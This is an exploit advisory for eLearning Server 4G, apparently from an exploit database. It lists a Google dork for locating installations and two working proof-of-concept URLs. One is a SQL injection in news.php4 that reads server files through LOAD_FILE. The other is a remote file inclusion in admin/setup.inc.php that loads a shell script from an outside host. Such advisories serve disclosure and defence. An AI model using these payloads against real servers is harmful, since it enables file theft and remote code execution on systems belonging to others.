# Exploit Title: eLearning Server Multiple Remote Vulnerabilities # Google Dork: intitle:"eLearning Server" # Date: 10.05.2012 # Author: Eugene Salov, Andrey Komarov (Group-IB, http://group-ib.ru) # Software Link: http://www.hypermethod.ru/ # Version: 4G # Tested on: Microsoft Windows news.php4 "nid" SQL injection: POC: /news.php4?nid=-12'+union+select+1,2,LOAD_FILE('C:\\Program%20Files\\Hypermethod\\eLearningServer\\index.php'),4,5,6,7,8,9,10,11/* admin/setup.inc.php Remote file Include POC: /admin/setup.inc.php?path=http://group-ib.ru/shell.txt?